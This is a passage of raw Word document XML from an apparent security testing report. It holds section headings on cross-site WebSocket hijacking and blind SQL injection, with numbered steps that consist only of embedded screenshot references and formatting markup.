                    <a:srcRect b="14579" l="0" r="35584" t="70036"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3657600" cy="508496"/>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9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 / 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zg7eqypqrv7e" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="4572000" cy="1730188"/>
            <wp:effectExtent b="9525" l="9525" r="9525" t="9525"/>
            <wp:docPr id="56" name="image50.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image50.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:srcRect b="0" l="0" r="0" t="29474"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1730188"/>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3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uths4qpc5n42" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.1. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site WebSocket Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024E">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3072384" cy="1820343"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="20" name="image29.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image29.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:srcRect b="3371" l="0" r="-4908" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3072384" cy="182034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F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000250">
      <w:pPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="4966447"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="4"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4572000" cy="49664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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 / 5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000252">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="3725333"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13" name="image37.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image37.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:srcRect b="7595" l="5682" r="14607" t="13359"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="3725333"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 / 5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000254">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="1237129"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="42" name="image48.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image48.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="45935" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="123712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5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 / 5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000256">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="1126541"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21" name="image26.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image26.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="39103" t="68401"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="1126541"/>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ind w:lef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8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mf6nr1bs59i9" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.1. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000259">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 / 5:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4572000" cy="4277591"/>
            <wp:effectExtent b="12700" l="12700" r="12700" t="12700"/>
            <wp:docPr id="40" name="image43.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image43.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="427759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B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 / 5:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025D">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="7781925"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="33" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect b="3778" l="5609" r="5609" t="6314"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="7781925"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 / 5:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025F">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="5029200" cy="3238805"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:srcRect b="0" l="0" r="1521" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="3238805"/>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200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="3200400" cy="1397508"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="27" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:srcRect b="4820" l="3512" r="9226" t="3455"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200400" cy="1397508"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000261">
      <w:pPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="72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62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4 / 5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000263">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5029200" cy="7845552"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="43" name="image49.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image49.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:srcRect b="4108" l="5369" r="14810" t="6950"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="7845552"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5 / 5:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000265">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="5029200" cy="3188513"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="35" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:srcRect b="0" l="0" r="6176" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="3188513"/>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pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nbsxnsuqg8yg" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="19050" distT="19050" distL="19050" distR="19050">
            <wp:extent cx="5029200" cy="1024467"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="48" name="image34.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image34.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:srcRect b="0" l="0" r="6122" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5029200" cy="1024467"/>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ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000268">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sgo07t19q31o" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000269">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="200" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9s6gpwk1mcf3" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
